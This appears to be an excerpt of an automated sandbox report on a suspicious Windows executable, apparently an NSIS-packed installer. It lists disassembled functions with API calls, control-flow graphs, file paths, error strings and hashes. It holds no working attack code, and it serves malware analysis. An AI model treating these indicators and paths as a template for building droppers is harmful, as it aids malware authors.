                                                      • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                      • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                      Function 004062B2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                      • String ID:
                                                      • API String ID: 310444273-0
                                                      • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                      • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                      • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                      • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                      Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 004020FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                      • API String ID: 542301482-3275360645
                                                      • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                      • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                      • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                      • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                      Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                      • ShowWindow.USER32(?), ref: 00403D1B
                                                      • DestroyWindow.USER32 ref: 00403D2F
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                      • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                      • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                      • EnableWindow.USER32(?,?), ref: 00403F9E
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                      • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                      • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: &B
                                                      • API String ID: 3282139019-3208460036
                                                      • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                      • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                      • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                      • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                      Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 290 4039a5-4039ce call 403bf5 call 405a9b 280->290 286 403984-403995 call 405e15 281->286 287 40399a-4039a0 lstrcatW 281->287 286->287 287->290 295 403a60-403a68 call 405a9b 290->295 296 4039d4-4039d9 290->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405f6a 295->303 296->295 298 4039df-403a07 call 405e15 296->298 298->295 304 403a09-403a0d 298->304 306 403b1c-403b24 call 40140b 302->306 307 403a9d-403acd RegisterClassW 302->307 303->302 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 4059c0 304->309 320 403b26-403b29 306->320 321 403b2e-403b39 call 403bf5 306->321 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 405993 call 405f48 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 319 403a3d-403a47 GetFileAttributesW 316->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->313 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->315 323->324 324->315 337 403bc8-403bca 330->337 332 403b65-403b77 GetClassInfoW 331->332 333 403b5e-403b63 LoadLibraryW 331->333 335 403b79-403b89 GetClassInfoW RegisterClassW 332->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 332->336 333->332 335->336 342 403bb7-403bc0 call 40386f 336->342 339 403be4-403be6 call 40140b 337->339 340 403bcc-403bd2 337->340 339->311 340->320 343 403bd8-403bdf call 40140b 340->343 342->313 343->320
                                                      APIs
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 004039A0
                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A20
                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                      • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                      • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                      • API String ID: 914957316-3645556243
                                                      • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                      • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                      • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                      • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                      Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 375 402e80-402e98 call 405b6f 372->375 376 402efe-402f02 372->376 373->367 384 402f0b-402f11 375->384 393 402e9a-402ea1 375->393 383 402f04-402f0a call 402d1a 376->383 376->384 383->384 385 402f13-402f21 call 406360 384->385 386 402f24-402f2e 384->386 385->386 386->360 386->361 393->384 399 402ea3-402eaa 393->399 397->353 408 40300e-403011 398->408 399->384 401 402eac-402eb3 399->401 400->367 400->370 401->384 403 402eb5-402ebc 401->403 403->384 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->384 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->384 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fTSt7dc60O.exe,00000400), ref: 00402DEC
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00402E35
                                                      • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fTSt7dc60O.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-4247983765
                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                      Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 556 401798-401799 call 4061dc 550->556 551->556 560 40179e-4017a2 556->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 607 401847-401848 575->607 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 594 4029d2-4029d6 589->594 592 4018c4-4018c7 591->592 593 4029c7-4029ca 591->593 596 4018c9-4018da call 405f6a lstrcatW 592->596 597 4018dc-4018df call 405f6a 592->597 593->589 603 4018e4-402243 call 405724 596->603 597->603 603->594 607->585 609 40184a-40184b 607->609 609->574
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 00401793
                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 004017B8
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp$C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call
                                                      • API String ID: 1941528284-877433953
                                                      • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                      • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                      • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                      • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                      Function 004051F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 619 405265-405269 617->619 620 405258-40525f SetWindowTextW 617->620 618->613 621 405249-40524d lstrcatW 618->621 622 40526b-4052ad SendMessageW * 3 619->622 623 4052af-4052b1 619->623 620->619 621->617 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                      APIs
                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                      • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
